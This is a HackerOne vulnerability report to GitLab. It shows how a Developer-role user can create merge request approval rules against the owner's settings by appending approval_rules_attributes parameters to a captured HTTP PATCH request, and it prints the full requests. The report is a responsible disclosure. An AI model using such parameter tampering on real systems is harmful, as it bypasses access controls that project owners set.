Override approvers and approvals required per merge request despite no permissions
HackerOne report #544756 by ashish_r_padelkar on 2019-04-21, assigned to estrike:
Summary
Hello,
Owner/Maintainer of the project may prevent overriding of approvers and approvals required per merge request by having the below settings in project settings
However, Developer users can still create new approval rules per merge request!
Steps to reproduce
- As a project owner , set a settings like below for merge request approval rule
- 
As a Developeruser in a project, go to any merge request and EDIT it. once it reloads, you see that you can not EDIT or Create new approval rules.
- 
Without doing anything else, just click on save and capture the below request 
POST /PrivateGroupofGuest/project2/merge_requests/2 HTTP/1.1  
Host: gitlab.com  
Connection: close  
Content-Length: 542  
Cache-Control: max-age=0  
Origin: https://gitlab.com  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3  
Referer: https://gitlab.com/PrivateGroupofGuest/project2/merge_requests/2/edit  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: _gitlab_session=1; event_filter=all; sidebar_collapsed=false
utf8=%E2%9C%93&_method=patch&authenticity_token=1&merge_request%5Btitle%5D=ExampleMergeRequest&merge_request%5Bdescription%5D=Closes+%233&merge_request%5Bassignee_id%5D=&merge_request%5Bmilestone_id%5D=847953&merge_request%5Blabel_ids%5D%5B%5D=&merge_request%5Blabel_ids%5D%5B%5D=10328587&merge_request%5Btarget_branch%5D=master&merge_request%5Bforce_remove_source_branch%5D=0&merge_request%5Bsquash%5D=0&merge_request%5Block_version%5D=  - Append below parameters in the above request
&merge_request[approval_rules_attributes][][name]=ThisIsCreatedDespiteSettingsByOnwer&merge_request[approval_rules_attributes][][user_ids][]=3148078&merge_request[approval_rules_attributes][][approvals_required]=1
Where as 3148078 is my user ID, you may try adding yours if mine doesnt work for you.
- So the final request would be like
POST /PrivateGroupofGuest/project2/merge_requests/2 HTTP/1.1  
Host: gitlab.com  
Connection: close  
Content-Length: 542  
Cache-Control: max-age=0  
Origin: https://gitlab.com  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3  
Referer: https://gitlab.com/PrivateGroupofGuest/project2/merge_requests/2/edit  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: _gitlab_session=1; event_filter=all; sidebar_collapsed=false
utf8=%E2%9C%93&_method=patch&authenticity_token=1&merge_request%5Btitle%5D=WIP%3A+Resolve+%22yyyy%22&merge_request%5Bdescription%5D=Closes+%233&merge_request%5Bassignee_id%5D=&merge_request%5Bmilestone_id%5D=847953&merge_request%5Blabel_ids%5D%5B%5D=&merge_request%5Blabel_ids%5D%5B%5D=10328587&merge_request%5Btarget_branch%5D=master&merge_request%5Bforce_remove_source_branch%5D=0&merge_request%5Bsquash%5D=0&merge_request%5Block_version%5D=&merge_request[approval_rules_attributes][][name]=ThisIsCreatedDespiteSettingsByOnwer&merge_request[approval_rules_attributes][][user_ids][]=3148078&merge_request[approval_rules_attributes][][approvals_required]=1  - 
Send this request. Once done, click on EDIT merge request again and scroll down to approval rules. 
- 
Now you should see the approval rule created despite it was not allowed by owners! 
 
What is the current bug behavior?
Developer can override the merge request approval rules despite settings by owner!
What is the expected correct behavior?
Developer should not be allowed to create approval rule when owner isnt allowing to create
Output of checks
This bug happens on GitLab.com and probably on omnibus installations too!
Regards,
Ashish
Impact
Developers can override approval rule settings
Attachments
Warning: Attachments received through HackerOne, please exercise caution!

